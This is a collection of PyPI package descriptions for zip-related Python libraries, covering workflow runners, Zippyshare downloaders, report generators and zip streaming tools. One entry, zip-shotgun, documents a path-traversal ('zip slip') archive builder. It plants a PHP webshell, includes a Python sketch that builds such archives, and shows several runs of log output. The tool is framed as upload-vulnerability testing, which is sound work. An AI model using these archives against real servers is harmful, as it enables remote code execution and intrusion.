proto-workflowexecute 'python -m zippy.make_params my_proto.json my_params.json'3. Fill in the blanks and/or connect the dotsOpen up my_params.json and fill in all the parameters that are currently blank.4. Run ZIPPYTo run ZIPPY, execute 'python -m zippy.zippy my_params.json'**More information is on the git wiki.**v2.1.3 (01/28/2019)- Improvements to RNA support (jsnedecor)v2.1.2 (11/13/2018)- Improvements to the bwa module (kwu)- Added stage for copying a folderv2.1.1 (6/14/2018)- Improvements to execution in local mode and other minor fixesv2.1.0 (4/11/2018)- First public release- Parameters 2.0. Support for subworkflows, parameter nesting and environments.- Support for running docker containers through singularity- Better optional parameters support. You can now create the function define_optionals(self), which returns a map of default values for optional parameters.- New stages (Nirvana variant annotation, minimap2 aligner, primer dimer detection)- New unit tests- Fewer known bugsv2.0.0 (2/14/2018)It's here! Release 2.0 inaugurates ZIPPY-as-a-package. You can now pip install ZIPPY, and once you do so, run it as python -m zippy.zippy. Furthermore, you can import zippy from anywhere and use the API. Special thanks to Wilfred Li for this work. 
As a bonus, we're finally moving to semantic-ish versioning.- ZIPPY as a package- API interface should be finalized- better docker support (can now support docker pull)- several small bugfixes- small documentation improvementsv1.9{6} (12/7/2017)- Provisional ZIPPY API (function names are interfaces not final)- Removed several external dependencies- Parameter detection now defaults to the inspect module, instead of the meta module (i.e., we avoid decompilation when possible)- Support for running locally instead of on SGE- Memory/core requirements can now be set both per-stage and globally- New stages (allowing you to delete intermediate outputs, to convert a bam to a fastq, and to downsample in style with a bloom filter)- DataRunner improvements: can now load sample list from a samplesheet, and can now manually map file names to zippy types- Better support for modules in external files (make_params now supports them fully)- Yet fewer bugs! Or at least... different bugs.v1.99999 (8/30/17)- Support for external modules (Runners defined in external code)- Lots of workflow improvements (argument passing for nearly everything, new bcl2fastq and BWA workflows)- New workflows (DNA/RNA QC, edger and Salmon)- New help system (run 'python zippy.py --help')v1.9999 (5/1/17)- Unit tests- Wildcards in the parameters files- Merge stages- Support for optional parametersv1.999 (2/16/17)- Arbitrary stage chaining- More stages- Fewer bugsv1.99First end-to-end version of ZIPPY## LicenseCopyright 2018 IlluminaLicensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
zippyshare
zippysharezippyshare complete API, CLI file manager, automatic account registration.HierarchyzippyshareDemoExamplepythonSeetest.
zippyshare-downloader
zippyshare-downloader

Download files from Zippyshare directly from Python.

Table of Contents: Key Features, Minimum Python Version, Installation (Python Packages Index (PyPI), From the source), Simple Usage (Command Line Interface (CLI), Embedding (API)), Links, FAQ

Key Features

With zippyshare-downloader you can:

download files from Zippyshare (yes, of course).
Extract filename, date uploaded, file size, and downloadable URL information from a given URL.
Fast download: allows you to download over 2 connections at the same time.

Minimum Python version

3.5.x

Installation

Python Packages Index (PyPI)

pip install zippyshare-downloader

From the source

Clone the repository

git clone https://github.com/mansuf/zippyshare-downloader.git
cd zippyshare-downloader

And then run setup.py

python setup.py install

NOTE: If you think zippyshare-downloader is already on the latest version, but the app doesn't seem to work properly (like this case #11), you can reinstall zippyshare-downloader with the following commands:

# For Windows
py -3 -m pip cache purge zippyshare_downloader
py -3 -m pip uninstall zippyshare-downloader
py -3 -m pip install -U zippyshare-downloader

# For Linux / Mac OS
python3 -m pip cache purge zippyshare_downloader
python3 -m pip uninstall zippyshare-downloader
python3 -m pip install -U zippyshare-downloader

If it still doesn't work properly, that means Zippyshare changed their code; you can open an issue here.

Simple Usage

Command Line Interface (CLI)

Read here for more information

zippyshare-dl "insert zippyshare url here"

# or
zippyshare-downloader "insert zippyshare url here"

# Use this if `zippyshare-dl` and `zippyshare-downloader` didn't work
python -m zippyshare_downloader "insert zippyshare url here"

Embedding (API)

Use zippyshare-downloader in your Python script. Read here for more information

from zippyshare_downloader import extract_info, extract_info_coro

# by default, parameter download is True
file = extract_info('insert zippyshare url here', download=True)
print(file)
# Output: <Zippyshare File name="..." size="...">

# async version
async def get_info():
    file = await extract_info_coro('insert zippyshare url here', download=True)
    print(file)

Links

Documentation
PyPI

FAQ

Q: I always get NameError: The use of "bla bla" is not allowed, what should I do?
A: Zippyshare always changes their code. Please update to the latest version; if your zippyshare-downloader is already the latest version, then open an issue here.
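The async variant above returns a coroutine, so it needs an event loop to run. A minimal sketch using only the standard library (assuming Python 3.7+ for asyncio.run):

import asyncio
from zippyshare_downloader import extract_info_coro

async def get_info():
    file = await extract_info_coro('insert zippyshare url here', download=True)
    print(file)

# Drive the coroutine to completion
asyncio.run(get_info())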
zippyshare-generator
Generator Links

Installing
Install and update using pip:

$ pip install zippyshare

zippyshare supports Python 2 and newer.

Example
What does it look like? Here is an example of generating a download link:

$ zippyshare.py -d /root/Downloads "https://www110.zippyshare.com/v/0CtTucxG/file.html" -n "myMovies.mp4"

The file will then be downloaded automatically, with "Internet Download Manager (IDM)" on Windows or with the built-in download manager.

You can also use it from the Python interpreter:

>>> from zippyshare import zippyshare
>>> generator = zippyshare()
>>> url_download = generator.generate("https://www110.zippyshare.com/v/0CtTucxG/file.html")
>>> generator.download(url_download, ".", "myMovies.mp4", False)
>>> # it will download automatically

For more options use '-h' or '--help':

$ zippyshare.py --help
or
$ zippyshare --help

Support
- Download with 'wget' (Linux/Windows) or 'Internet Download Manager (IDM)' (Windows) (pip install idm)
- Python 2.7+ (only)
- Windows, Linux

Links
License: BSD
Code: https://bitbucket.org/licface/zippyshare
Issue tracker: https://bitbucket.org/licface/zippyshare/issues
zipr-azure
No description available on PyPI.
zipr-core
No description available on PyPI.
zip-read-yaml
No description available on PyPI.
zipreport
zipreport
Very lightweight module for creating PDF reports with Python.

Motivation
This library is meant to be a drop-in replacement for report generation I was doing with FileMaker Pro, and it operates under roughly the same principles as FileMaker Pro's print layout. You, the client, have a list of ordered records, which can be any subscriptable thing but in my example are dicts, and these are fed into a Document object you create and customize, which establishes how fields in each record are formatted and laid out on the page, the formatting of page headers and footers, and summary headers and footers.

Example
In the example you can see how a basic report is customized. All formatting is contained in a Document object, which draws Part objects in various parts of the document based on certain conditions. The page_header and page_footer parts are drawn at the top and bottom of each page.

Each record to be printed is displayed in a content_part:

content_part = Part(
    elements=[
        Element(x=0., y=0., width=72., height=18.,
                content=FormattedText("N:$name", font_family='Futura', font_size=9.)),
        Element(x=96., y=0, width=72. * 4., height=4. * 72., can_shrink=True,
                content=FormattedText("$comment", font_family='Futura', font_size=9.)),
        Element(x=72. * 6, y=0., width=36, height=18,
                content=FormattedText("$rn", font_family='Futura', font_size=9., alignment='r')),
    ],
    minimum_height=72.)

A Part contains a list of Element objects which define a rectangle (positioned relative to the origin, the upper-left corner of the parent Part), and each element has a corresponding Content. Content objects contain specific style and content. The FormattedText content has a format string which can substitute values from a content object. In the example above, the first element reads the 'name' key from the content object and substitutes it into the format string.

Under Construction
This project is still under construction but functions on a basic level.
zipreport-lib
ZipReportTransform HTML templates into beautiful PDF or MIME reports, with full CSS and client Javascript support, under a permissive license.Want to see it in action? Check thisexample!Highlights:Create your reports using Jinja templates;Dynamic image support (embedding of runtime-generated images);Reports are packed in a single file for easy distribution or bundling;Optional MIME processor to embed resources in a single email message;Support for browser-generated JS content (with zipreport-server);Support for headers, page numbers and ToC (usingPagedJS, see details below);Requirements:Python >= 3.8Jinja2 >= 3.1Compatible backend for pdf generation (zipreport-server, xhtmltopdf, or WeasyPrint);v2.x.x breaking changesStarting with zipreport 2.0.0, support for the electron-based zipreport-cli rendering backend is removed; using azipreport-serverversion 2.0.0 or later - preferably using a docker container, is now the recommended approach.The behavior of the JS event approach has also changed; PDF rendering can now be triggered via console message, instead of dispatching an event.If you use JS events to trigger rendering, you need to update your templates.Old method:(...)// signal PDF generation after all DOM changes are performeddocument.dispatchEvent(newEvent('zpt-view-ready'))(...)New method, starting with v2.0.0:(...)// signal PDF generation after all DOM changes are performedconsole.log('zpt-view-ready')(...)InstallationInstalling via pip:$pipinstallzipreport-libTL;DR; exampleUsing zipreport-cli backend to render a report file:fromzipreportimportZipReportfromzipreport.reportimportReportFileLoader# existing zpt templatereport_file="report.zpt"# output fileoutput_file="result.pdf"# template variablesreport_data={'title':"Example report using Jinja templating",'color_list':['red','blue','green'],'description':'a long text field with some filler description',}# load report from filezpt=ReportFileLoader.load(report_file)# initialize api clientclient=ZipReport("https://127.0.0.1:6543","secretKey")job=client.create_job(zpt)# generate a PDF by calling the processor, using the API client# this method returns a JobResultresult=client.render(job,report_data)# if PDF generation was successful, save to fileifresult.success:withopen(output_file,'wb')asrpt:rpt.write(result.report.read())Paged.jsPagedJSis an amazing javascript library that performs pagination of HTML documents for print, under MIT license. It acts as polyfill for W3C specification for print, and allows the creation of headers, footers, page numbers, table of contents, etc. in the browser.To use PagedJS capabilities,zipreport-servermust be used as a backend.Available backendsZipreport-Serverzipreport-serveris a headless browser daemon orchestrator, designed specifically to work with ZipReport. It can be either installed locally or run via docker.zipreport-server is the only supported backend that enables full usage of client-side JavaScript and leveraging the PagedJS capabilities.WeasyPrintThis backend is provided for compatibility. For new projects, please use zipreport-server.WeasyPrintis a popular Python library to generate PDFs from HTML. It doesn't support JavaScript, and CSS is limited.DocumentationDetailed documentation on usage and report building is available on theproject documentation.
zipr-http
No description available on PyPI.
ziproto
ZiProtoZiProto is used to serialize data, ZiProto is designed with the intention to be used for transferring data instead of using something like JSON which can use up more bandwidth when you don't intend to have the data shown to the public or end-userSetuppythonsetup.pyinstallUsageTo encode data, this can be done simply>>importziproto>>ziproto.encode({"foo":"bar","fruits":['apple','banana']})bytearray(b'\x82\xa6fruits\x92\xa5apple\xa6banana\xa3foo\xa3bar')The same can be said when it comes to decoding>>importziproto>>Data=ziproto.encode({"foo":"bar","fruits":['apple','banana']})>>ziproto.decode(Data){'foo':'bar','fruits':['apple','banana']}To determine what type of variable you are dealing with, you could use the decoder>>importziproto>>fromziproto.ZiProtoDecoderimportDecoder>>Data=ziproto.encode({"foo":"bar","fruits":['apple','banana']})>>SuperDecoder=Decoder(Data)>>print(SuperDecoder.get_type())ValueType.MAPLicenseCopyright2018 Zi Xing NarrakasLicensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS"BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
zipseeker
Similar systems/projects:

- The Nginx zip module. Only for Nginx, so it can't be used with other webservers.
- python-zipstream. Does not support calculating the file size beforehand or seeking through the file.

Usage:

import zipseeker

# Create an index
fp = zipseeker.ZipSeeker()
fp.add('some/file.txt')
fp.add('another/file.txt', 'file2.txt')

# Calculate the total file size, e.g. for the Content-Length HTTP header.
contentLength = fp.size()

# Calculate the last-modified date, e.g. for the Last-Modified HTTP header.
lastModified = fp.lastModified()

# Send the ZIP file to the client.
# Optionally add the start and end parameters for range requests.
# Note that the ZIP format doesn't support actually skipping parts of the file,
# as it needs to calculate the CRC-32 of every file at the end of the file.
fp.writeStream(outputFile)

Why?
While the file size of a ZIP file usually can't be calculated beforehand due to compression, compression is actually optional. The headers themselves also have a pretty constant size. That means that the whole file can have a predetermined file size (and modtime).

This is useful when you want to provide ZIP downloads of large directories of uncompressable files (e.g. images). The specific use case I created this library for was to provide downloads of whole photo albums without such inconveniences as requesting a download link by e-mail, using a lot of system resources for the creation of temporary files, and having to delete those files afterwards.

Of course, it's possible to just stream a ZIP file, but that won't provide any progress indication for file downloads and certainly doesn't support Range requests.

For more information, see the Nginx zip module.
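A quick way to sanity-check the pre-computed size described above is a small sketch of my own (the photo file names are placeholders; only the add()/size()/lastModified()/writeStream() calls documented in the usage snippet are used):

import os
import zipseeker

fp = zipseeker.ZipSeeker()
fp.add('photos/IMG_0001.jpg')                  # stored under its own name
fp.add('photos/IMG_0002.jpg', 'second.jpg')    # stored under an alternate name

expected_length = fp.size()        # what you would send as Content-Length
last_modified = fp.lastModified()  # what you would send as Last-Modified

with open('album.zip', 'wb') as out:
    fp.writeStream(out)            # stream the archive into the file

# The generated archive should match the size computed before any data was written.
assert os.path.getsize('album.zip') == expected_length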
zipsender
No description available on PyPI.
zip-shotgun
ZIP ShotgunUtility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post onSilent Signal Techblog - Compressed File Upload And Command Executionand fromOWASP - Test Upload of Malicious FilesThis script will create archive which contains files with "../" in filename. When extracting this could cause files to be extracted to preceding directories. It can allow attacker to extract shells to directories which can be accessed from web browser.Default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is availableHEREInstallationInstall using Python pippip install zip-shotgun --upgradeClone git repository and installgit clone https://github.com/jpiechowka/zip-shotgun.gitExecute from root directory of the cloned repository (where setup.py file is located)pip install . --upgradeUsage and optionsUsage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE Options: --version Show the version and exit. -c, --directories-count INTEGER Count of how many directories to go back inside the zip file (e.g 3 means that 3 files will be added to the zip: shell.php, ../shell.php and ../../shell.php where shell.php is the name of the shell you provided or randomly generated value [default: 16] -n, --shell-name TEXT Name of the shell inside the generated zip file (e.g shell). If not provided it will be randomly generated. Cannot have whitespaces -f, --shell-file-path PATH A file that contains code for the shell. If this option is not provided wwwolf (https://github.com/WhiteWinterWolf/wwwolf- php-webshell) php shell will be added instead. If name is provided it will be added to the zip with the provided name or if not provided the name will be randomly generated. --compress Enable compression. If this flag is set archive will be compressed using DEFALTE algorithm with compression level of 9. By default there is no compression applied. -h, --help Show this message and exit.ExamplesUsing all default optionszip-shotgun archive.zipPart of the script output12/Dec/2018 Wed 23:13:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php ... 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. 
Try to access shell using BCsQOkiN23ur7OUj.php in the URLUsing default options and enabling compression for archive filezip-shotgun --compress archive.zipPart of the script output12/Dec/2018 Wed 23:16:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 ... 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URLUsing default options but changing the number of directories to go back in the archive to 3zip-shotgun --directories-count 3 archive.zipzip-shotgun -c 3 archive.zipThe script will write 3 files in total to the archivePart of the script output12/Dec/2018 Wed 23:17:43 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URLUsing default options but providing shell name inside archive and enabling compressionShell name cannot have whitespaceszip-shotgun --shell-name custom-name --compress archive.zipzip-shotgun -n custom-name --compress archive.zipName for shell files inside the archive will be set to the one provided by the user.Part of the script output12/Dec/2018 Wed 23:19:12 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. 
Archive will be compressed using DEFLATE algorithm with a level of 9 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php ... 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URLProvide custom shell file but use random name inside archive. Set directories count to 3zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zipzip-shotgun -c 3 -f ./custom-shell.php archive.zipShell code will be extracted from user provided file. Names inside the archive will be randomly generated.Part of the script output12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf 12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URLProvide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compressionzip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zipzip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zipShell code will be extracted from user provided file. Names inside the archive will be set to user provided name.Part of the script output12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. 
Content will be added to archive 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL
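For reference, here is a minimal stand-alone sketch of the archive layout the tool produces — zip members whose names climb out of the extraction directory — using only Python's standard zipfile module. The shell name, payload, and output path are placeholders of mine, not taken from zip-shotgun itself:

import zipfile

payload = b"<?php /* placeholder payload */ ?>"

with zipfile.ZipFile("archive.zip", "w", zipfile.ZIP_STORED) as zf:
    for depth in range(3):                     # similar to --directories-count 3
        arcname = "../" * depth + "shell.php"  # shell.php, ../shell.php, ../../shell.php
        info = zipfile.ZipInfo(arcname)
        info.external_attr = 0o777 << 16       # full read/write/execute, as the tool sets
        zf.writestr(info, payload)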
zipslicer
ZIPSLICER📁✂️A library for incremental loading of large PyTorch checkpointsRead a blogpost introduction by yours trulySynopsisimporttorchimportzipslicer# Could be a private custom recurrent sentient transformer# instead of a garden variety resnetmy_complicated_network=torch.hub.load("pytorch/vision:v0.10.0","resnet18",pretrained=True)s_dict=my_complicated_network.state_dict()torch.save(s_dict,"my_network_checkpoint_v123.pth")delmy_complicated_network# Later, on a smaller unrelated machine you load a "LazyStateDict"# Which is just like a regular state dict, but it loads tensors only when it has tolazy_s_dict=zipslicer.load("my_network_checkpoint_v123.pth")layer3_tensors={}forkinlazy_s_dict.keys():ifk.startswith("layer3"):layer3_tensors[k]=lazy_s_dict[k]# Now you have layer3's tensors and you can analyze them without breaking your RAM.# Or you can instantiate the layers' classes in sequence and compute the whole# network's output for a given input by threading the activations through them.# But we will just print the tensors instead:print(layer3_tensors)Run this example and unit-tests:python examples/example_resnet18.pypytest -o log_cli=true --capture=tee-sys -p no:asyncioTest your checkpoint for compatibility:python tests/test_checkpoint_readonly.py your_magnificent_checkpoint.pthIf it's all green, it will work.PrerequisitesSupported python and torch versions:python-3.10 + torch-(1.11,1.12,stable)python-3.11 + torch:stableGenerally,zipslicershould work with modern enough install of PyTorch - useincluded safe testto check for compatibility ofzipslicerwith your PyTorch and your checkpoint. This is a pure Python library, so specific CPU architecture shouldn't matter.A checkpoint produced by saving your model'sstate_dictvia vanilla torch.save(...) - default settings should suffice, as Torch doesn't use ZIP compression.An application that can take advantage of incrementally-loaded checkpoint - i.e. if your app just loads allstate_dict.items()in a loop right away it doesn't make much sense to use this library. Make sure your code readsstate_dict.keys()(andstate_dict.get_meta(k)if necessary) and uses these intelligently to work on a subset ofstate_dict[k]tensors at a time. For general inspiration you might readthis (HF)andthis (arxiv). With some additional engineering it should be possible to run Large Language Models likeBLOOM-176BorFLAN-T5-XXLon a single mid-range GPU at home - if you are willing to wait for a night's worth of time. In the large batch regime this might even make some practical sense, for example to process a set of documents into embeddings.InstallGenerally, copying thezipslicer/zipslicerdirectory into your project's source tree is enough.If you are a fan of official ceremony-driven install processes for executable modules of dubious provenance, soon there will be a possibility of installing this boutique software module via pip:pip install zipslicerNotesThis library is only for reading pytorch tensors from checkpoints. We leave writing for future work.Writing to loadedstate_dictis frowned upon, but itwillwork - though you should avoid doing this while iterating over keys for now and expecting the keys to reflect this update.Perhaps more importantly,general-purpose pickles are not supported- the design of this library doesn't allow you to load whole neural network class instances. Usually this isn't necessary, andpytorch official documentation recommends you to usestate_dictfor model serialization. 
We supportstate_dict's.Some rare tensor types (i.e: pytorch quantized tensors - not to be confused with integer tensors which work fine) are not yet supported. If this bothers you, share your experience in issues.We say "Hi" toHFsafetensorsproject, but note that in comparison to theirs, our approach doesn't require checkpoint conversion which takes significant time and storage. In fact, both approaches could be complementary, as you will have to load tensors from the pytorch checkpoint somehow to convert it tosafetensors- and the default loading mechanism is constrained by available RAM.Prospective features we are consideringIf you are interested in some of these features, consider creating an issue:Effective loading of tensor slices - to implement tensor parallelism in sharded deploymentsAccessing the source checkpoint over a networkWriting to a checkpoint in-placeIncremental conversion to other checkpoint formats
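As an additional illustration of the incremental pattern from the synopsis above (a sketch of my own, not from the project docs — the checkpoint name is the one used in the synopsis), you can tally parameter counts one tensor at a time so that only a single tensor is ever resident in memory:

import zipslicer

lazy_s_dict = zipslicer.load("my_network_checkpoint_v123.pth")

total_params = 0
for k in lazy_s_dict.keys():
    t = lazy_s_dict[k]        # the tensor is only read from the zip at this point
    total_params += t.numel()
    del t                     # release it before moving on to the next key
print("total parameters:", total_params)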
zipster-invoicing
No description available on PyPI.
zipstream
UNKNOWN
zipstreamer
# ZipStreamerZipStreamer is a Python library for generating ZIP files on-the-fly with ZIPfile size information.This library was implemented using logic from Python's `zipfile` library andGolang's `archive/zip` library.```pythonz = ZipStream(files=[ZipFile('file.txt', 4, lambda: StringIO('test'), None, None),ZipFile('emptydir/', None, None, None, None),ZipFile('dir/remote.txt', remote_file_size, get_remote_file, None, None),])size = z.size()res = Response(z.generate(), mimetype='application/zip')res.headers['Content-Length'] = str(size)```## Installation```pip install zipstreamer```## Examples```pip install flask requestsPYTHONPATH=. FLASK_APP=examples/flask_example.py flask run```## Testing```pipenv install --dev --skip-lockpipenv run nosetests```Testing multiple versions:```pip install pyenv tox tox-pyenvpyenv install 2.7.14pyenv install 3.4.8pyenv install 3.5.5pyenv install 3.6.4pyenv install 3.7-devpyenv local 2.7.14 3.4.8 3.5.5 3.6.4 3.7-devtox```
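The snippet near the top of this README leaves remote_file_size and get_remote_file undefined; a filled-in local-file version might look like the sketch below. The import path and the meaning of the last two constructor arguments are assumptions based on the snippet, not confirmed by the docs:

import os
from zipstreamer import ZipStream, ZipFile  # import path assumed

path = "photos/cat.jpg"
z = ZipStream(files=[
    # (name in archive, size in bytes, callable returning a file object, None, None)
    ZipFile("cat.jpg", os.path.getsize(path), lambda: open(path, "rb"), None, None),
])

size = z.size()  # can be sent as Content-Length before streaming starts
with open("out.zip", "wb") as out:
    for chunk in z.generate():
        out.write(chunk)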
zipstream-new
python-zipstreamzipstream.py is a zip archive generator based on python 3.3's zipfile.py. It was created to generate a zip file generator for streaming (ie web apps). This is beneficial for when you want to provide a downloadable archive of a large collection of regular files, which would be infeasible to generate the archive prior to downloading or of a very large file that you do not want to store entirely on disk or on memory.The archive is generated as an iterator of strings, which, when joined, form the zip archive. For example, the following code snippet would write a zip archive containing files from 'path' to a normal file:importzipstreamz=zipstream.ZipFile()z.write('path/to/files')withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)zipstream also allows to take as input a byte string iterable and to generate the archive as an iterator. This avoids storing large files on disk or in memory. To do so you could use something like this snippet:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Of course both approach can be combined:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write('path/to/files','my_archive_files')z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Since recent versions of web.py support returning iterators of strings to be sent to the browser, to download a dynamically generated archive, you could use something like this snippet:defGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)If the zlib module is available, zipstream.ZipFile can generate compressed zip archives.Installationpip install zipstream-newRequirementsPython 2.6+, 3.2+, [email 